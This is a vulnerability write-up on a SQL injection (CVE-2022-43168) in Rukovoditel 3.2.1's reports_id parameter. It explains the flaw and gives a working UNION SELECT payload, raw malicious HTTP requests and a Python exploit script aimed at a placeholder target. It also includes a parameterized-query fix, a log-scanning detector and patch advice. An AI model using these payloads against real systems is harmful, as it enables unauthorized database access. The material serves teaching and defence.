Rukovoditel, a popular open-source project management tool, is widely used across companies and teams for collaborative project tracking. In October 2022, a serious SQL injection vulnerability (CVE-2022-43168) was discovered in version 3.2.1 of Rukovoditel. This flaw allows attackers to execute arbitrary SQL queries through the reports_id parameter, potentially exposing or destroying sensitive data.
In this long read, we break down what CVE-2022-43168 is, how it works, demonstrate how you can exploit it, and explain how to mitigate the issue. This guide will be easy to follow, even if you’re new to web vulnerabilities.
What is CVE-2022-43168?
CVE-2022-43168 is a SQL Injection vulnerability found in Rukovoditel v3.2.1. The vulnerable parameter is called reports_id and appears in several endpoints, including URLs related to report generation.
The flaw happens because the application doesn’t properly sanitize user-supplied input. Unsanitized user input gets inserted into a SQL query, allowing attackers to "inject" their own SQL code.
The vulnerable parameter, reports_id, is found in requests like:
GET /index.php?module=ext/reports/print_report&reports_id=xxx
Here, the input passed via reports_id is directly used in a SQL statement.
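To make the root cause concrete, here is an added example (not Rukovoditel's code and not from the original write-up) that reproduces the pattern in Python against an in-memory SQLite table constructed for the purpose. One lookup concatenates the raw reports_id string into the query text, exactly the anti-pattern described above; the other validates the value and binds it as a parameter. The table name, its columns and sqlite_version() are assumptions standing in for the real schema and MySQL's version().

```python
import sqlite3

# Constructed in-memory stand-in for a reports table; not the real Rukovoditel schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE reports (id INTEGER PRIMARY KEY, name TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO reports VALUES (?, ?, ?)",
        [(5, "Q3 budget", "alice"), (6, "Hiring plan", "bob")],
    )
    return conn

def vulnerable_lookup(conn, reports_id):
    # The request value is spliced into the SQL text, so a value that contains
    # SQL syntax extends the statement instead of being compared to the id column.
    sql = f"SELECT id, name, owner FROM reports WHERE id = {reports_id}"
    return conn.execute(sql).fetchall()

def hardened_lookup(conn, reports_id):
    # Two independent defences: reject anything that is not a plain integer,
    # then bind the value as a parameter so it can never become SQL syntax.
    if not reports_id.isdigit():
        raise ValueError(f"reports_id must be a positive integer, got {reports_id!r}")
    sql = "SELECT id, name, owner FROM reports WHERE id = ?"
    return conn.execute(sql, (int(reports_id),)).fetchall()

# The payload from the article, with SQLite's version function in place of MySQL's.
PAYLOAD = "5 UNION SELECT 1, sqlite_version(), 3-- -"

def demo():
    """Return (rows leaked by the vulnerable lookup, whether the hardened one refused)."""
    conn = make_db()
    leaked = vulnerable_lookup(conn, PAYLOAD)
    try:
        hardened_lookup(conn, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked

if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable lookup returned:", leaked)
    print("hardened lookup refused the payload:", blocked)
```

Running it shows the vulnerable lookup returning the legitimate report row plus a second row carrying the database version, while the hardened lookup refuses the value before any SQL runs. Parameter binding alone would already prevent the injection; the integer check is kept because a report id has no business being anything else, and rejecting it early gives a clean place to log the attempt.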
Exploiting CVE-2022-43168 (Proof of Concept)
Let’s see how an attacker might use this vulnerability.
Assume a page where you can export or print reports. The URL looks like this:
http://example.com/index.php?module=ext/reports/print_report&reports_id=5
If you change the reports_id parameter to something malicious, like:
http://example.com/index.php?module=ext/reports/print_report&reports_id=5+UNION+SELECT+1,version(),3--
Original request
GET /index.php?module=ext/reports/print_report&reports_id=5 HTTP/1.1
Host: example.com
Malicious request
GET /index.php?module=ext/reports/print_report&reports_id=5+UNION+SELECT+1,version(),3-- -
Host: example.com
If successful, instead of printing the report with ID 5, the server will execute:
SELECT ... FROM ... WHERE reports_id = 5 UNION SELECT 1, version(), 3-- -
What happens:
The page may now show the MySQL server version (for example "8.0.31" or similar), leaking critical database information.
Here’s a simple exploit using Python and requests:
import requests

# Target info: the vulnerable endpoint and the injected reports_id value
base_url = 'http://example.com/index.php'
params = {
    'module': 'ext/reports/print_report',
    'reports_id': "5 UNION SELECT 1,version(),3-- -"
}

# requests URL-encodes the parameters for us
r = requests.get(base_url, params=params, timeout=10)
print(r.text)  # Look for the database version in the output
Note: Replace example.com with your target host.
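From the defender's side, the same property that makes the bug easy to trigger makes attempts easy to spot: a legitimate reports_id is always a plain integer, so anything else in that parameter is worth an alert, whatever the payload looks like. The following added example (not part of the original article) scans constructed Apache-style access log lines for that condition. The log lines, IP addresses and timestamps are made up for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined-log style; not real traffic.
SAMPLE_LOG = """\
10.0.0.7 - - [28/Oct/2022:17:20:01 +0000] "GET /index.php?module=ext/reports/print_report&reports_id=5 HTTP/1.1" 200 5120
10.0.0.7 - - [28/Oct/2022:17:20:05 +0000] "GET /index.php?module=ext/reports/print_report&reports_id=5+UNION+SELECT+1,version(),3--+- HTTP/1.1" 200 5388
10.0.0.9 - - [28/Oct/2022:17:21:10 +0000] "GET /index.php?module=ext/reports/print_report&reports_id=abc HTTP/1.1" 200 5120
10.0.0.9 - - [28/Oct/2022:17:21:12 +0000] "GET /index.php?module=dashboard HTTP/1.1" 200 2048
"""

# Enough of the combined-log format to pull out client, time, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def suspicious_reports_id(target):
    """Return the decoded reports_id if it is not a plain integer, else None."""
    # parse_qs decodes both %XX escapes and '+' as space, so encoded payloads
    # are compared in the same form the application sees them.
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in qs.get("reports_id", []):
        if not re.fullmatch(r"\d+", value):
            return value
    return None

def scan(log_text):
    """Return one finding per request whose reports_id is not an integer."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        bad = suspicious_reports_id(m["target"])
        if bad is not None:
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": m["status"],
                "reports_id": bad,
            })
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} reports_id={f['reports_id']!r}")
```

The check is deliberately an allow-list on the parameter's shape rather than a signature for UNION or comment sequences, so encoding tricks or a different injection technique against the same parameter are flagged just the same. A status of 200 on a flagged line is the case to look at first, since it suggests the server processed the value rather than rejecting it.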
Beyond reading data, a successful injection could let an attacker:
- Modify, delete, or create database entries
- Take over the entire application/data
References
- CVE-2022-43168 at NVD
- Original advisory on GitHub
- Exploit Database Entry
Update Rukovoditel:
The developers patched this in later versions. If you are running v3.2.1, update to the latest version from the official site.
Conclusion
CVE-2022-43168 is a critical SQL injection vulnerability in Rukovoditel v3.2.1, stemming from poor input sanitization in the reports_id parameter. Any team running this software should update immediately.
Exploiting this bug can be as simple as a crafted URL. Fixes are available, so patch your instance!
Stay safe and proactive when it comes to web application security.
*This article is exclusive and aims to provide a clear, practical guide for understanding and dealing with CVE-2022-43168 in Rukovoditel v3.2.1. For further details, always consult official documentation and security advisories.*
Timeline
Published on: 10/28/2022 17:15:00 UTC
Last modified on: 11/01/2022 12:50:00 UTC